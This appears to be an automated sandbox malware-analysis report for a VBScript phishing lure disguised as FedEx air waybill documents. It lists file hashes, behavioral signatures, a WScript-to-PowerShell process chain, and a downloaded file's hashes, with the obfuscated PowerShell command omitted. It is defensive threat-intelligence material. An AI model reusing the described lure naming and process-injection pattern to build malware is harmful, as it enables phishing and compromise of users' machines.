Analysis
max time kernel: 148s
max time network: 151s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 09-07-2024 10:53
Static task: static1
Behavioral task: behavioral1
Sample: fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs
Resource: win7-20240704-en
Behavioral task: behavioral2
Sample: fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs
Resource: win10v2004-20240704-en
General
Target: fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs
Size: 101KB
MD5: 20d1961bd8aa051dfb5632bf9be3e084
SHA1: 75aafde8ec0657db8c60570c12620e0b7072f552
SHA256: 0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2
SHA512: 3a362c2598bdacbb574b2663fac8679a52f84b158e405c2a44581fe45537e05bf09c2d41bb68848d64c419683810c6fa5bb17d8dd04bdc67ab0c4ef53188534f
SSDEEP: 3072:p4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvaiIu:Ot7SPReHd0WoT28faa+CS64mu8IQCtv1
Malware Config
Signatures
Blocklisted process makes network request (64 IoCs)
Processes (flow, PID, process):
- flow 3: PID 2512 WScript.exe
- flows 5-8 and 10-68: PID 2464 powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes: PID 2464 powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes: Token: SeDebugPrivilege, PID 2464 powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
Processes (source PID, source process, target PID, target process):
- PID 2512 WScript.exe wrote to memory of PID 2464 powershell.exe (3 entries)
- PID 2464 powershell.exe wrote to memory of PID 112 cmd.exe (3 entries)
Processes
Level 1: C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs"
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID: 2512
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted]"
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2464
Level 3: C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
PID: 112
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 70KB
MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1: 1723be06719828dda65ad804298d0431f6aff976
SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b